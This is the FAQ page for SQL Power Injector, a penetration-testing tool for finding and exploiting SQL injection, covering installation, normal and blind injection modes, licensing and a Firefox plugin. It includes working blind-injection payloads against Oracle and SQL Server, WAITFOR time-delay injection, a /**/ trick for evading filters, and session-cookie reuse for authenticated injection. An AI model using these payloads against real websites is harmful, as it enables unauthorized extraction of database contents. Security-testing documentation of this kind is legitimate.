Product | Tech info | Tutorial | FAQ | Download | Contact | EN

FAQ

+ Installation
+ How do I use it
+ Licensing and Copyright
+ Versioning
+ Plugin

Installation

What requirements do I need to make it run?

This application runs with the .Net Framework 1.1 SP1 or 2.0 so you will be required to have one of these framework installed. However, for some reasons the application will have problems to run if you have the .Net Framework 1.1 and 2.0 installed without the 1.1 SP1. So do not be surprised to be asked to install the .Net Framework 1.1 Service Pack 1 even though you have 2.0 installed.

Also you'll need Internet Explorer 5+ to make it work.

What are those two dll files: AxInterop.SHDocVw.dll and Interop.SHDocVw.dll?

The application uses a component that is not included by default in the .Net Framework. This component is an ActiveX Control that was present in the previous versions of Microsoft development environment (Visual Basic).

In order to work in the .Net environment this ActiveX needs to have a proxy to communicate with the common runtime language (CRL). This proxy is automatically created by .Net when the reference to the component is created. At that moment, .Net adds two dll files reflecting this reference to the project: one for the actual ActiveX Control and the other for the created proxy. That is why they are mandatory to the execution of the application and must be there in order to make it work.

This ActiveX Control is the Microsoft Web Browser Control used for the browsing part of the application. I thought it was really convenient and had all the functionalities and events I needed for the application.

Why is there a file called SQLPowerInjector.exe.config in the application root directory?

This file is necessary if SQL Power Injector wants to load web pages containing errors in its header. As an example the W3C standard RFC 2616 section 4 stipulates that after the header fields an empty line (CRLF) should indicate the end of those fields. In some case, only a CR or LF is inserted causing thus an error in SQL Power Injector in the loading process.

In order to be able to load as many pages as possible I have to add a value in that file to ignore those kind of protocol violations.

This application runs in a framework owned by Microsoft and I have a UNIX or Linux or Macintosh operating system, is there any way that it could work on my operating system?

They are at least two well-known applications that make it possible to develop and run .Net projects.

Here is the list of the two applications with their web site:

All the necessary information related to installation should be found in their respective web site.

You can always read this article to have further information to how to make it work on Linux: http://www.builderau.com.au/program/0,39024614,39130565,00.htm

I have problems with the installation, is there any hotline or any contact I can reach to help me out?

No hotline is available since it's a free product but I will gladly try to help anyone who might have a problem in a reasonable delay if you email me at support (at) sqlpowerinjector.com

Will the Plugin be installed automatically with the installation executable?

No. You will need to install it with Firefox by one of the following ways:

If you use Firefox:

If you use Internet Explorer:


How do I use it

When I click on the Load button I get this message "No FORM tag with the POST option checked". Why?

There is no form tag found in the page you loaded. It could mean many things. Here are at least two possible reasons:

  1. The URL that you loaded has been copy pasted from a web site that contains one or several frames. Those frames might contain the parameters you want to load, if it's the case you will have to specifically find the URL of those frames.

    HINT: right click on the web page close of the place you think that contains the parameters you want. Then click on the properties, and copy paste the URL.

  2. By default the web page is loaded with the POST method. Perhaps you wanted to load it with the GET option. Just choose it and try again.

What is the Normal mode?

The normal mode is basically what anyone would do first when they try to SQL inject. That is to say, it takes the value(s) in the Datagrid and sends them to the web server as is.

What is the Blind mode?

This mode could be used if there is no way to display the information on the returned web page that has been SQL injected. That's why it is called blind SQL injection. You can use it in two ways:

At that moment, the application will send requests to the server and by dichotomy will compare the true or false expected response or the time delay until it finds the requested value.

HINT: Try to find the SQL command to inject first in normal mode and use the blind SQL injection mode if there are no other choices.

Why are there three text insertion values in the parameter grid?

These three text insertion values are the main core of what makes the application special.

Depending on which mode you are, the application will use only one or the three text insertion values. If you are in normal mode you will need only the first called "Starting string". In this case, all your inputs are exactly what are sent, no modification or strings added.

On the other hand, if you use the blind mode you will have to choose one of the parameter that you can SQL inject and use the three strings. (Note: you choose one in checking the parameter on the left). In this case, the one selected will add according to what type of information you want to get (Word, Length or Count) some strings after the starting string (where it gets its name from) and before the varying string and finally after the varying string and before the ending string (where it gets its name from as well).

For example to get the IP address of the server hosting an Oracle DB:

Options:

SMITH' AND 30 < (SELECT ASCII(SUBSTR(CAST(SYS_CONTEXT('USERENV', 'IPADDRESS') AS VARCHAR(4000)), 1, 1)) FROM DUAL)--

Legend:

           Blue: Starting string
           Red and italic: Automatically added strings
           Purple and bold: Varying string
           Green: Ending string

As you can see many strings are added automatically and some parts will change until it gets the full IP address value of the previous example.

Here another example to make sure that the aspect is better understood:

Let's say we want the length of the name of the first database in the attacked SQL Server

Options:

white' AND 30 < (SELECT LEN(name) FROM master..sysdatabases where dbid=1)--

Legend:

           Blue: Starting string
           Red and italic: Automatically added strings
           Purple and bold: Varying string
           Green: Ending string

And if you want to get the full name, you just need to change the type to Word. Moreover, if you want to get the name of the second database you need to change the value of dbid to 2 and click start. As you can see once the syntax is found, the rest is just a matter to change some value.

Subsequently you can construct your SQL string to inject with the specific commands you want and it will fill in the information that is repetitive if you are in blind mode.

I discovered with time that when I was building my SQL strings to inject that the syntax could be broken in three main portions. And if some values can change as you have seen in the example, the one that always revolve around is the varying string.

What exactly is the varying string?

It will be the data that you want to obtain once the SQL injection is made. It is only available in blind mode.

Read the question "Why are there three text insertion values in the parameter grid?" for more details.

What does the weird result message exactly mean?

There is some kind of error on the server. Here is a non-exhaustive list that could cause this:

What is the use of the check box Error?

When someone tries to find a possible SQL injection vulnerability in a web page it is useful to look inside the page response if there are any hints of success. In order to point out any place where that error could be, I decided to add the option that will search for any occurrence of the word "error" in the source of the page.

It could be useful in the case that someone wants to get the specific information of the error without all the rest of the source code. Its sole purpose is to add some clarity and find out right away the real error message at first glimpse. However the size of what you get after the Error word will depend of the size inserted in the "HTML Message Length". If you see there is not enough info just change that value for a bigger one and click start again and this until you are satisfied.

Why I didn't want to make it automatic? The reason is simple, sometimes in the source there is some place that the word Error is used without meaning it's an actual SQL injection error. For example, in a JavaScript code that handles a variable containing error in it.

As an additional note, the application will detect and only display the common ODBC error automatically since it's what we are searching for. It's currently hard coded but I intent to use a file in a subsequent version that could be edited to add all the database errors I didn't think about.

What is the use of the "Replace space by /**/"?

Sometimes a web site will have an IDS or some kind of string filtering mechanism that will try to catch all common used syntax words in TSQL or PL/SQL. One way to bypass them is simply to replace the space by /**/. So this option will do it automatically for you.

I suggest trying it if you don't get any positive results in your SQL injection, you might be lucky.

I know that I can inject time delay but when I type WAITFOR DELAY '0:0:5', I get a result after about two/three/four/… times later than my value set in the delay. What's wrong?

It's a good sign, because now you know that the WAITFOR delay works. However, it means that the injected parameter is used many times in the dynamically built query on the server side.

So if the query uses the parameter three times and you used a time delay of 4 seconds, you will get a response approximately after ~13 seconds (~1 second to execute the actual server side code of the web page). Now the good news is that nothing is lost, instead to have your Delay in seconds parameter set to 4 seconds you need to change it for 12 and voila!

The response displayed of my SQL injection has been cut in a place that I don't get any real SQL injection error, why?

It will happen when you have the "Trap Error String" checked and there is an occurrence of the word "error" in the response source code of the page that is not a real error. For example, it could be found in a javascript function where a variable will contain the word error into it.

Read the question "What is the use of the check box Error?" for more details.

The response displayed of my SQL injection has been cut and I cannot read the rest of the message, what happened?

It could be any of those three reasons:

Why don't I see any pictures in the response window?

The goal of this application is to help to find SQL injection in a web page and exploit it. So I made the decision to use the Microsoft Web Browser Control ActiveX to only display what is necessary and avoid the distractions that images could bring. I didn't intend it to be a real browser in any cases.

However, I'm fully aware that in some real rare occasion that the hint of success of the SQL injection could be in a picture (error or an exclamation point in a picture for example). So I might add this functionality in a subsequent version if I see that a lot of people ask for it. In any cases, the picture's name might have the error word in it and be detected with the option "Trap Error String".

I lose the injected values in the grid results when I select a line, why?

All the spaces will be replaced by a + sign in order to be understood by the web server. Consequently, it will be considered like a huge word by the Datagrid. So if this word goes beyond the visible width of the line it will only display the first words before that one if you select it. ("Is True - " for example)

You just need to click inside the line you want to read and scroll right with the arrow key until the end.

It's great that the application automatically adds some SQL code but is it possible to see exactly what the SQL injection string would be like before sending it?

You only need to go over the row of the parameter you want to send with the mouse and after a second or two a Tooltip with the SQL injection string will be displayed.

Take note that if you just modified a value in the parameter strings and the focus is still in the textbox you won't see the change. What you need to do is to click anywhere else in the form and go over again with the mouse for a few seconds to see the change.

I have problems to use it, is there any hotline or any contact I can reach to help me out?

No hotline is available since it's a free product but I will gladly try to help anyone who might have a problem in a reasonable delay if you email me at support (at) sqlpowerinjector.com

I know I can SQL inject but only after I'm logged in the web application, what can I do?

I would assume that if you went this far it's because you have already a valid login and password. Knowing this here's two methods you can do:

Easiest way:

  1. If you haven't installed the SQL Power Injector in Firefox do so
  2. Login in the application and go to the vulnerable page
  3. Use the Plugin to launch SQL Power Injector with all the session context and voila! You are all set to start your tests.

Hardest or old way:

  1. Copy paste the URL of the page you know you can SQL inject in the URL parameter textbox, then click Load
  2. At that point you should depending of your web site have a message stating that there is an error because there is no session or access denied. It's fine don't worry.
  3. Now, with a normal browser go on the web site and log on. Normally the web site will create a session with either a session token in the cookie or inserted in the URL
  4. a) If it's in the URL, it's pretty easy, just go at the page you can SQL inject, copy the URL with the valid session and paste it in the URL parameter textbox and click Load. Now it should work
    b) If it's in the cookie you need to get it either with the browser preferences (Mozilla, Netscape and the like) or with a proxy application such as Paros (http://www.parosproxy.org/index.shtml) or webscarab (http://www.owasp.org/software/webscarab.html) to name a few... I personally recommend using a proxy application because with the browsers you won't get the cookie information in the right format, that is to say:
    MySessionID=AGDAFHAD3142324.
    Once you found it, just copy it.
  5. Go back to the application SQL Power Injector (it was open because of the step 1, if you skipped that part do the step one before to go on) and in the menu choose the Insert and click Cookie there.
  6. An input box will be displayed, just paste the cookie value there and click ok. The format should look like this for a JSP session:
    JSESSIONID=D23TfhU3fdf7884HDSA45hfdGs
  7. Now click on Start again and you should see the page like when you are logged. It means it's ready to SQL inject.

What exactly is the SQL positive injection result?

Like the error option "Trap Error String" it makes the application search for an occurrence in the returned web page source for the word inserted in that textbox. It will display the text from that string up to the length inserted in the "HTML Message Length".

It could be useful once you have discovered what is the key word that shows that there is a SQL injection problem or to try to quickly find a piece of information in the returned web page source.

Read the question "What is the use of the check box Error?" for more details

What is the use to inject a cookie?

For many reasons:

Where can I find the right cookie information to inject?

Either in the browser preferences, if you use Mozilla based browsers or with the help of a proxy such as Paros (http://www.parosproxy.org/index.shtml) or webscarab (http://www.owasp.org/software/webscarab.html) to name a few...

I personally recommend using a proxy because with the browsers you won't get the cookie information in the right format, that is to say:

MySessionID=AGDAFHAD3142324

How can I get the maximum or minimum value of a column?

In the varying string you need to use the SQL command MAX or MIN with your value between parentheses.

Example:

          MAX(OBJ#) for maximum of an Oracle object ID,
          MIN(OBJ#) for minimum of an Oracle object ID

          Useful when you want to get all the tables from an Oracle database...

Why do I get a different display when I change from the normal to blind mode?

Because some options are only available on normal mode and not in blind mode and vice versa. I believe that it's much clearer if I display what is necessary to the current mode.

Why does the number of thread stop at 50?

I decided to stop it at 50 for no particular reason. It could have been stopped at 10 or 100. However, just know that if you go beyond a certain point you will either end up saturating the line or not have enough CPU power. The statistic figures on the web site show how much the highest value is not always the best.

But if you think you can go beyond that I encourage to go modify the code and raise it to the number you want. The modifications are not too hard to make since it's a constant value.

However, by personal experience when you get beyond 8 you start to get many errors (sun characters) and slows down significantly.

Why can I change the number of the starting length and starting count?

It's only a question of optimization. The mechanism to find out what is the current character in blind injection is determined by dichotomy. The dichotomy according to Merriam Webster is a division or the process of dividing into two especially mutually exclusive or contradictory groups or entities.

Let's say we have a starting length size of 1000000 and your data is of a length of 6, the application will need to send to the server these values before to be close of the real number:

1000000,
500000,
250000,
125000,
62500,
31250,
15625,
7812,
3906,
1953,
976,
488,
244,
122,
61,
30,
15,
7,
3,
5,
6

21 calls to the server... But if you use something more reasonable such as 30:

30,
15,
7,
3,
5,
6

6 calls to the server, much faster.

So now with this understood you can optimize the starting length or count in this fashion.

What is the point to have the method type and color specified in the detected Submit URL?

In order to load fields contained in a web page SQL Power Injector needs to know where you want to get them from. That is to say if you want to get them from the URL strings or inside the form. From that point, you had no way to know which method you needed to request the page. Ending up to click on the start button and getting a page that doesn't make sense or any visible results.

Now with that option it's possible to change the option to GET or POST accordingly to the detected method for that specific form and thus get the web application expected result. However, it could always be interesting to see how the application reacts if you don't use the expect method.

The different color code is just to add some ergonomic improvement and readability.

I loaded a session that I previously saved and it's no more working, what's wrong?

It could be caused by three things.

First possibility could be at the moment you saved session there were different fields or values that have changed on the web page that makes the web application work differently. To make sure they are still the same just reload the page and see if it's different.

Second possibility could be that you or someone else modified the session XML file and it's no more compliant with the web page.

Last possibility is that the web page needs an authentication cookie and it's no more valid. What you need is to trap the cookie again and reinsert it as explained in the question "I know I can SQL inject but only after I'm logged in the web application, what can I do?"

Why when I add a new string parameter I get a new cookie parameter or vice-versa?

It might be because the wrong type of parameter is selected when you click on add button. Or you selected the wrong type of parameter before you clicked on add button.

There are two ways to see if you have the right type of parameter selected:

Why can I use TOP with only SQL Server and not the other DBMS?

Because only SQL Server supports that feature reliably (Sybase/AES seems to behave weirdly so I removed it). Surely they are the equivalency in the other DBMS but it was requiring much more effort that I could allow at this moment. Perhaps in subsequent versions...

When I look at the page source the color does not appear or it does after some time, why?

Eventually it will appear. It's because the application is processing the HTML tags and text inside the page source. The bigger and more complex is, the longer it takes. I might eventually make some optimization in subsequent version.

Why are there two MySQL database type in the list?

Because MySQL before version 4.1.1 uses a different SQL syntax for the blind SQL injection. Indeed,  MySQL 4.1.0 and under does not support CAST and SUBSTR only SUBSTRING does and SUBSTRING has appeared with version 4.1.1. Also, it's not possible to use CAST with CHAR until version 4.1.1.

Consequently, two MySQL database types have been added to the list

What is the use of the character preset feature?

A huge gain of time and much more less number of requests to the web server. Of course if you know how to use it efficiently.

With the dichotomy technique, in order to find the representation of a character in ASCII you need to go through all the existing 256 characters in the ASCII table. It would require thus 8 requests to the web server by character. Knowing this, let’s say you have a sentence that contains 100 characters that would make about 800 requests. If we consider that in average the round trip takes half a second, it would take 400 seconds, so 6 minutes and 40 seconds. Quite some time, isn't?

So I asked myself, how can I optimize it? It came to me that most of the time the strings that I was trying to get were predictable when it comes to the type of characters they contained. That is to say that beforehand I was able to know that in some cases a string would be only alphabetic characters with spaces. So why use the full set of characters (256) when in fact I needed to search inside 53 characters? Even better, if I can make it uppercase on the SQL side, why would I need to use the 52 alphabetic set? (26 lower case and 26 upper case) Now I can go to only 27 characters. And if you really wanted to optimize it more, you could remove Z and some other characters that are rarely used in a word.

At that point you lower the number of requests for a character by 3 or 4 in some cases. So let's say we lower it only by 3 and we use our word of 100 characters. It would require then 500 requests, with half a second the round trip, it would take 250 seconds so 4 minutes and 10 seconds. So you succeeded to save 2 minutes and 30 seconds! Imagine now that you need to get 50 values how much time you'll gain...

Note: In order to use the optimization with UPPERCASE you need to check Case Insensitive checkbox and select in the chosen characters preset only upper case characters.

I saved a session with Sybase and it’s now displaying MySQL 4.1.1 when I load it, why?

Since I divided MySQL database type in two the index after MySQL 4.1.0 and under in the database type drop down list has been added by 1. So since only Sybase/AES was after MySQL in the list, only that DBMS has been impacted. Its index was 4 and now it is 5 because MySQL 4.1.1 and above is now 4. Incidentally, now when you load a session with Sybase/AES it will display MySQL 4.1.1 and above.

I'm really sorry about that and hope it would not impact you too much. The good news is that Sybase is not as widely used than the other DBMS so it was where I mitigated the risk.

In order to fix the problem, just load each session in which you used Sybase, change it in the drop down list and resave it over the old file.

Why do I get the sun character(s) ¤ inside in the resulting Word string?

It's because the application wasn't able to resolve that character. So instead to forever stay on that character a new mechanism will transform that character to the sun character.

The right question should be why is the application not able to resolve that particular character? It can be due to many reasons.

Here are some:

Licensing and Copyright

What is the limitation of use?

There is no limitation of use as long as you respect the Clarified Artistic license belonging to the product.

May I use it to do professional security assessment for free?

Of course, and I encourage to do so.

May I reuse the code for my own security application that will be sold?

You have again to respect the Clarified Artistic license regarding this issue. Here are the two main points (3 and 4) in the license regarding that point:

  1. You may otherwise modify your copy of this Package in any way, provided that you insert a prominent notice in each changed file stating how and when you changed that file, and provided that you do at least ONE of the following:
    1. place your modifications in the Public Domain or otherwise make them Freely Available, such as by posting said modifications to Usenet or an equivalent medium, or placing the modifications on a major network archive site allowing unrestricted access to them, or by allowing the Copyright Holder to include your modifications in the Standard Version of the Package.
    2. use the modified Package only within your corporation or organization.
    3. rename any non-standard executables so the names do not conflict with standard executables, which must also be provided, and provide a separate manual page for each non-standard executable that clearly documents how it differs from the Standard Version.
    4. make other distribution arrangements with the Copyright Holder.
    5. permit and encourge anyone who receives a copy of the modified Package permission to make your modifications Freely Available in some specific way.
  2. You may distribute the programs of this Package in object code or executable form, provided that you do at least ONE of the following:
    1. distribute a Standard Version of the executables and library files, together with instructions (in the manual page or equivalent) on where to get the Standard Version.
    2. accompany the distribution with the machine-readable source of the Package with your modifications.
    3. give non-standard executables non-standard names, and clearly document the differences in manual pages (or equivalent), together with instructions on where to get the Standard Version.
    4. make other distribution arrangements with the Copyright Holder.
    5. offer the machine-readable source of the Package, with your modifications, by mail order.

Versioning

Will we expect any more versions in the future?

Not likely. I agreed with my employer that I will finish this version and stop to create any major version in order to avoid any conflict of interest since I'm working in the same field. In any cases I don't mind it that much since it takes a lot of my time that is removed on other things that are dear to me. My beloved wife, future family, Taekwon-do and violin.

Unless someone else starts to help me with the project it is pretty much set for now. However, the good news is that I will fix any bugs that are found, answer your emails and probably add some minor functionalities.

Will the application remain free?

What I can promise is that the main functionalities will remain free. One day I might sell it with added functionalities that companies will require, such as reporting, or if some intensive or professional support will be demanded.

They are things that require more time and professional follow up that I can't just handle alone. So I might need to hire some people to help me out. Again, it will entirely depend of the popularity of the application.

But worry not all the powerful features will be there free of charge. And I will help as much as I can anyone asking questions about the application or requiring help. Just be patient with me because I'm alone in this project.

Is there any list of future features available somewhere?

Not officially, but as you can see if you read the whole FAQ, sometimes I let some ideas of features slip in the text.

I have great ideas to improve the application. How can I help?

I will be delighted to hear about it! The hardest part has been made, the path's finding, now it's time to make this path more secure, solid and better.

However, if you want to submit code I'm open to this as well since it's open source, but you'll have to remember that I'm acting as a project and quality manager and might modify some code to be coherent with the rest. Don't worry, the general algorithm will be kept, it's just that I might modify the indentation, variables naming and add some comments if all of those are necessary. It's my square side I guess but I think that it's an important side to have in application industry.

You can reach me to improvement (at) sqlpowerinjector.com to communicate all your ideas.

I have found bugs in the application, where do I communicate them?

You can send them to bugs (at) sqlpowerinjector.com. It will help me a lot and I'll appreciate it very much. If it's never cool to have bad criticisms or bugs found in your work, I personally think it's just a good opportunity to get things better.

Please, try to give as much details as you can about the bug and if you can, a screen shot as well (if applicable).

Plugin

What is the main purpose of this Plugin?

Simply put, to make your life much easier.

It will automatically get all the relevant parameters from the current web page, launch SQL Power Injector and load them for you. But more importantly it will also load all the cookies associated to the current session. That is to say all session cookies.

There were two annoying things with the previous version of SQL Power Injector that I found.

The first one was to systematically load each page that I suspected that contained SQL injection and then test them when in reality it was much easier to make quick tests inside the browser itself while navigating the website. The true power of SQL injector is to help you to find hard to find SQL injections. Not those you only need to add a quote in the parameter. But let's say you suspect there is SQL injection in that page but can't find it easily then you just need to use the Plugin and voila! Your true tests start. Much faster that way.

The second point, and by far the most annoying, is if I need to use cookies to keep the session, after I logged for instance, I would need to get their value and add them manually in the application. Now whenever you wish, before or after you logged, you just need to use the Plugin and all the session context associated to the cookies will be pass for you.

Why is there only a Plugin for Firefox and not any for Internet Explorer?

For two reasons.

First one is the fact that it's much easier and faster to create one with Firefox.

And second one, is lack of time.

Beside, I figured out that most of the SQL Power Injector users use Firefox anyways. And since I created the application with Microsoft technology I thought it was only fair that I will use something else.

Why when I use the Plugin I get only the value from POST and not from GET or vice-versa?

Because you need to change it inside the Options of the Plugin.

I know it's not practical but I'm going to make it better in the next version of the Plugin. Again the evil lack of time has struck...

Where do you change the default load method?

You need to go in the Tools menu, then Add-ons. There find the SQL Power Injector Plugin and click on Options. From there you can change the default behavior.

Copyright © 2006-2014 Francois Larouche